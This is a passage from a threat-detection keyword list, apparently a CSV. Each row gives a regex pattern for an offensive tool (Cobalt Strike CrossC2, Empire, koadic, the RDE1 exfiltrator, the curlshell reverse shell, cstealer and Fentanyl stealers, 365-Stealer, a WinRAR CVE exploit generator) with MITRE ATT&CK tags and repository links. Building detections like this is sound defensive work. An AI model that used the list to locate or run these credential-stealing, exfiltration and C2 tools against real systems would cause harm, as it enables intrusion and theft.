TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "* core.stager *",".{0,1000}\score\.stager\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "* couchdb-databases.nse*",".{0,1000}\scouchdb\-databases\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* couchdb-stats.nse*",".{0,1000}\scouchdb\-stats\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* crack_list client_wordlists.py*",".{0,1000}\scrack_list\sclient_wordlists\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* crack_list cracklist_api.py*",".{0,1000}\scrack_list\scracklist_api\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* crack_list dictionary.py*",".{0,1000}\scrack_list\sdictionary\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* crack_list wordlist.py*",".{0,1000}\scrack_list\swordlist\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* --crack-status*",".{0,1000}\s\-\-crack\-status.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* --crawl=*",".{0,1000}\s\-\-crawl\=.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* crawler.py -u http*",".{0,1000}\scrawler\.py\s\-u\shttp.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","0","N/A","6","10","1835","245","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" "* crde_arm_musl https -*",".{0,1000}\scrde_arm_musl\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* crde_armv7 https -*",".{0,1000}\scrde_armv7\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* crde_debug https -*",".{0,1000}\scrde_debug\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* crde_linux https -*",".{0,1000}\scrde_linux\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* crde_linux_aarch64 https -*",".{0,1000}\scrde_linux_aarch64\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* crde_linux_x86_64 https -*",".{0,1000}\scrde_linux_x86_64\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* crde_macos https -*",".{0,1000}\scrde_macos\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* crde_release https -*",".{0,1000}\scrde_release\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* crde_windows https -*",".{0,1000}\scrde_windows\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* crde_windows_x64 https -*",".{0,1000}\scrde_windows_x64\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* crde_windows_x86 https -*",".{0,1000}\scrde_windows_x86\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* Create-HotKeyLNK.ps1*",".{0,1000}\sCreate\-HotKeyLNK\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* createproxydll.sh*",".{0,1000}\screateproxydll\.sh.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","0","N/A","9","1","11","0","2024-03-22T10:29:56Z","2024-03-15T15:15:45Z" "* --createpub -n 7828374823761928712873129873981723...12837182 -e 65537*",".{0,1000}\s\-\-createpub\s\-n\s7828374823761928712873129873981723\.\.\.12837182\s\-e\s65537.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* Cred_Dump.sh*",".{0,1000}\sCred_Dump\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "* credentials /pvk:*",".{0,1000}\scredentials\s\/pvk\:.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "* credmaster.py*",".{0,1000}\scredmaster\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "* credmaster-success.txt*",".{0,1000}\scredmaster\-success\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "* credmaster-validusers.txt*",".{0,1000}\scredmaster\-validusers\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "* creds-summary.nse*",".{0,1000}\screds\-summary\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*- Cronos rootkit debugger -*",".{0,1000}\-\sCronos\srootkit\sdebugger\s\-.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "* CrossC2 Listener*",".{0,1000}\sCrossC2\sListener.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "* CrossC2.*",".{0,1000}\sCrossC2\..{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "* CrossC2Kit *",".{0,1000}\sCrossC2Kit\s.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","0","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "* CSExec.py*",".{0,1000}\sCSExec\.py.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* -CShardDLLBytes*",".{0,1000}\s\-CShardDLLBytes.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* cstealer.py*",".{0,1000}\scstealer\.py.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","0","N/A","10","8","756","389","2024-04-26T21:18:07Z","2021-08-03T00:52:45Z" "* ctfr.py*",".{0,1000}ctfr\.py.{0,1000}","offensive_tool_keyword","ctfr","Abusing Certificate Transparency logs for getting HTTPS websites subdomains.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0010","N/A","N/A","Information Gathering","https://github.com/UnaPibaGeek/ctfr","1","0","N/A","N/A","10","1897","287","2024-01-02T17:19:37Z","2018-03-06T01:14:28Z" "* cups-info.nse*",".{0,1000}\scups\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* cups-queue-info.nse*",".{0,1000}\scups\-queue\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* curlshell.py*",".{0,1000}\scurlshell\.py.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "* cursorinit.vbs*",".{0,1000}\scursorinit\.vbs.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "* --custom_user_agent*",".{0,1000}\s\-\-custom_user_agent.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","4","325","56","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "* --custom-steal",".{0,1000}\s\-\-custom\-steal","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "* --custom-steal listusers*",".{0,1000}\s\-\-custom\-steal\slistusers.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "* --custom-steal onedrive*",".{0,1000}\s\-\-custom\-steal\sonedrive.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "* --custom-steal onenote*",".{0,1000}\s\-\-custom\-steal\sonenote.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "* --custom-steal outlook*",".{0,1000}\s\-\-custom\-steal\soutlook.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "* --cve=* --command*",".{0,1000}\s\-\-cve\=.{0,1000}\s\-\-command.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* CVE-2023-38831-RaRCE*",".{0,1000}\sCVE\-2023\-38831\-RaRCE.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","114","21","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "* cvs-brute.nse*",".{0,1000}\scvs\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* cvs-brute-repository.nse*",".{0,1000}\scvs\-brute\-repository\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -d * -dc * -nu 'neo4j' -np *",".{0,1000}\s\-d\s.{0,1000}\s\-dc\s.{0,1000}\s\-nu\s\'neo4j\'\s\-np\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -d * -n * -m reverse*=",".{0,1000}\s\-d\s.{0,1000}\s\-n\s.{0,1000}\s\-m\sreverse.{0,1000}\=","offensive_tool_keyword","InvisibilityCloak","Proof-of-concept obfuscation toolkit for C# post-exploitation tools","T1027 - T1059.003 - T1140 - T1107","TA0004 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/h4wkst3r/InvisibilityCloak","1","0","N/A","N/A","5","435","157","2022-07-22T14:13:53Z","2021-05-19T14:19:49Z" "* -d * -n * -m rot13*",".{0,1000}\s\-d\s.{0,1000}\s\-n\s.{0,1000}\s\-m\srot13.{0,1000}","offensive_tool_keyword","InvisibilityCloak","Proof-of-concept obfuscation toolkit for C# post-exploitation tools","T1027 - T1059.003 - T1140 - T1107","TA0004 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/h4wkst3r/InvisibilityCloak","1","0","N/A","N/A","5","435","157","2022-07-22T14:13:53Z","2021-05-19T14:19:49Z" "* -d * -t axfr >*",".{0,1000}\s\-d\s.{0,1000}\s\-t\saxfr\s\>.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "* -d * -t zonewalk > *",".{0,1000}\s\-d\s.{0,1000}\s\-t\szonewalk\s\>\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - 